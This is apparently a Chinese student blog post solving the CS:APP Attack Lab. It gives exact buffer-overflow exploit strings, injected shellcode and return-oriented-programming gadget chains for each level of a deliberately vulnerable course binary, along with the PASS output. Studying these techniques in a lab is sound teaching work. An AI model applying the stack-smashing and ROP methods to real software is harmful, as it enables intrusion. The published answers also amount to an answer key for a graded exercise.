• csapp-attacklab(完美解决版)


    注意:必须阅读Writeup,否则根本看不懂这个lab要怎么做

    实验前准备

    1.在终端中输入./ctarget和./rtarget结果报错

    百度后得知自学的同学需要在执行文件时加上-q参数,不发送结果到评分服务器。后来发现官网已经说明了针对self-study student需要使用"-q" option

    gbd里面的run也要"-q"

    2.使用objdump -d反汇编ctarget

    Part 1:Code Injection Attacks

    Level 1

    覆盖返回值,调用touch1,ctarget_phase1.txt中的值为 "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40" ,前40个字符用来填充getbuf的帧,最后三个字符修改返回地址为0x4017c0,getbuf的帧如下图所示。

    root@65f9e6ae256b:/usr/csapp/attacklab/target1# ./hex2raw < ctarget_phase1.txt | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
        user id    bovik
        course    15213-f15
        lab    attacklab
        result    1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 
    

    Level 2

    覆盖返回值,使离开getbuf后跳转至0x59b997fa处,执行如下注入的代码。getbuf的帧如下图所示。

     0:    68 ec 17 40 00           pushq  $0x4017ec
     5:    bf fa 97 b9 59           mov    $0x59b997fa,%edi
     a:    c3                       retq   
     b:    90                       nop
     c:    90                       nop
     d:    90                       nop
     e:    90                       nop
     f:    90                       nop
    

    我一开始将touch2的首地址0x4017ec注入到帧里,移动栈指针至保存了0x017ec的地方,这样虽然也能使代码跳转至touch,但无法通过notify_server,因为这是不规范的,规范的做法是使用push,将0x4017ec保存至栈中。
    为什么push是规范的方法?首先要看ret指令的含义,执行ret指令时,ret指令从栈中弹出值,然后跳转到这个地址。在本题中,需要利用ret跳转至touch2,所以先将touch2的首地址压入栈中。
    执行push指令后,栈的状态如下图所示:

    有意思的是,指令的地址是从低处开始,逐渐增大,而栈的地址是从存储空间的最高处开始,逐渐减小。这和配套视频所讲的内容相对应。
    除此之外,指令之间可以没有间隔,比如上图第一条指令和第二条指令在存储器上是连续的。

    root@65f9e6ae256b:/usr/csapp/attacklab/target1# ./hex2raw < ctarget_phase2.txt | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target ctarget
    PASS: Would have posted the following:
        user id    bovik
        course    15213-f15
        lab    attacklab
        result    1:PASS:0xffffffff:ctarget:2:68 EC 17 40 00 BF FA 97 B9 59 C3 90 90 90 90 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 
    

    Level 3

    由于调用hexmatch和strncmp函数会覆盖getbuf的帧,所以需要注入的数据不能保存在geybuf的帧上,使用gdb反汇编并查看汇编代码,发现getbuf调用的Gets函数会将输入的字符保存在首地址为0x604500的地方,所以使用存储地址为0x604500的存储空间保存注入的cookie。
    使用gdb工具查看hexmatch,可以发现,s保存的是cookie中每一个字符对应的十六进制asiic码,具体如表所示:

    cokie 5 9 b 9 9 7 f a
    cookie 0x35 0x39 0x62 0x39 0x39 0x37 0x66 0x61

    所以需要保存在0x604500是cookie中的字符对应的十六进制assic码,注入的代码如下

     0:   68 fa 18 40 00          pushq  $0x4018fa
      5:   48 c7 c7 00 45 60 00    mov    $0x604500,%rdi
      c:   48 c7 07 35 39 62 39    movq   $0x39623935,(%rdi)
     13:   48 c7 47 04 39 37 66    movq   $0x61663739,0x4(%rdi)
     1a:   61 
     1b:    c3                       retq   
     1c:    90                       nop
     1d:    90                       nop
     1e:    90                       nop
     1f:    90                       nop
    

    注意代码中第三行和第四行指令中立即数的顺序,立即数中低位保存在存储地址低位的地方

    root@65f9e6ae256b:/usr/csapp/attacklab/target1# ./hex2raw < ctarget_phase3.txt | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
        user id    bovik
        course    15213-f15
        lab    attacklab
        result    1:PASS:0xffffffff:ctarget:3:59b997fa
    

    Part 2:Return-Oriented Programming

    和part1不同,part2设置了栈随机化和限制可执行代码区域(设置栈帧为不可执行区域)来对抗缓冲区溢出攻击

    Level 2

    先编译farm.c再反汇编farm.o可以得到farm.c对应的汇编代码,实际上这段代码在rtarget中,但是rtarget中东西太多,单独拿出来看更清晰。

    gcc -Og -c farm.c
    objdump -d farm.o
    

    Writeup中提示如下:

    • All the gadgets you need can be found in the region of the code for rtarget demarcated by thefunctions start_farm and mid_farm.•
    • You can do this attack with just two gadgets.
    • When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploitstring will contain a combination of gadget addresses and data.

    查看farm.c的汇编代码,发现一共有三个gadget,分别是

    # gadget1
    # 48 89 c7 -> movq %rax,%rdi, from 0x4019a2
    00000000004019a0 :
      4019a0:    8d 87 48 89 c7 c3        lea    -0x3c3876b8(%rdi),%eax
      4019a6:    c3                       retq 
    
    # gadget2
    # 48 89 c7 -> movq %rax,%rdi,from 0x019c5
    00000000004019c3 :
      4019c3:    c7 07 48 89 c7 90        movl   $0x90c78948,(%rdi)
      4019c9:    c3                       retq   
    
    # gadget3
    # 58 -> popq %rax, from 0x4019cc
    00000000004019ca :
      4019ca:    b8 29 58 90 c3           mov    $0xc3905829,%eax
      4019cf:    c3                       retq  
    

    gadget1和gadget2是一样的,所以两个都可以使用,我使用了gadget2。
    输入字符后getbuf的帧如下图所示

    代码执行过程
    1.跳转至gadget3,执行 “popq %rax” 从帧中取出0x59b997fa,保存在%rax
    2.跳转至gadget2,执行 “movq %rax,%rdi” 将0x59b997fa保存在%rdi
    3.跳转至touch2

    root@65f9e6ae256b:/usr/csapp/attacklab/target1# ./hex2raw < rtarget_phase4.txt | ./rtarget -q
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target rtarget
    PASS: Would have posted the following:
        user id    bovik
        course    15213-f15
        lab    attacklab
        result    1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00
    

    Level 3

    在farm.c里找到这些gadget,心中已经有数了,把cookie字符随注入字符保存在存储空间,通过%rsp来确定这个字符的位置,不过想了很久还是无法具体实现。
    movq %rax,%rdi
    popq %rax
    movq %rsp,%rax
    movl %eax, %edx
    movl %ecx, %esi
    movl %edx, %ecx
    movl %esp,%eax
    后来百度看到一篇知乎文章,文章中使用了一个官方没有提到的 "add $0x37, %al" 指令,虽然他最终PASS了,但是这显然是不符合规范的。
    但是这也提醒了我,自己对gadget的理解还不够透彻,一开始以为只有代码碎片才能称之为gadget,实际上完整的代码也能当作gadget,比如我接下来将会用到的add_xy,其c代码如下:

    long add_xy(long x, long y)
    {
        return x+y;
    }
    

    add_xy的汇编代码如下:

    00000000004019d6 :
      4019d6:    48 8d 04 37              lea    (%rdi,%rsi,1),%rax
      4019da:    c3                       retq  
    

    最后输入的字符为 "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 20 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 AD 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61" ,输入字符后getbuf的帧如下图所示:

    注入字符对应的含义为:

    可以看到,正好使用了8个gadget,而Writeup中提到官方的方法使用了8个gadget
    从下往上数第一行让%rsp指向的值出栈,并保存在%rax中,同时%rsp的值加1,跳过了常数值0x2,继续执行下一条指令,第3行-第5行将0x2保存在%esi中,第6行将%rsp的值取出来(需要注意的是,这时的%rsp指向第7行,这也是常数值取0x20的原因)保存在%rdi中,第8行add_xy的参数保存在%rdi和%rsi中,之前的指令都是在为add_xy做准备,add_xy的结果指向第11行。最后将%rax的值保存在%rdi中,跳转至touch3。

    root@65f9e6ae256b:/usr/csapp/attacklab/target1# ./hex2raw < rtarget_phase5.txt | ./rtarget -q
    Cookie: 0x59b997fa
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target rtarget
    PASS: Would have posted the following:
        user id    bovik
        course    15213-f15
        lab    attacklab
        result    1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 20 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 AD 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 
    

    __EOF__

  • 本文作者: 双层吉士堡
  • 本文链接: https://www.cnblogs.com/changyunyan/p/18182428
  • 关于博主: 评论和私信会在第一时间回复。或者直接私信我。
  • 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
  • 声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。
  • 相关阅读:
    基于XC7VX690T FPGA+ZU15EG SOC的6U VPX总线实时信号处理平台(支持4路光纤)
    MongoDB - 非关系型数据库概念
    华为云IoT与OpenHarmony深度协同,加速设备上鸿即上云【云驻共创】
    前端优化方案--改善 JS 性能
    vue项目查看vue版本-- 踩坑
    荷兰国旗问题与快速排序算法
    【毕业设计】基于javaEE+原生Servlet+MySql的Web停车场管理系统设计与实现(毕业论文+程序源码)——停车场管理系统
    聊聊“死锁“
    C语言指针面试题——第二弹
    建站系列(一)--- 网站基本常识
  • 原文地址:https://www.cnblogs.com/changyunyan/p/18182428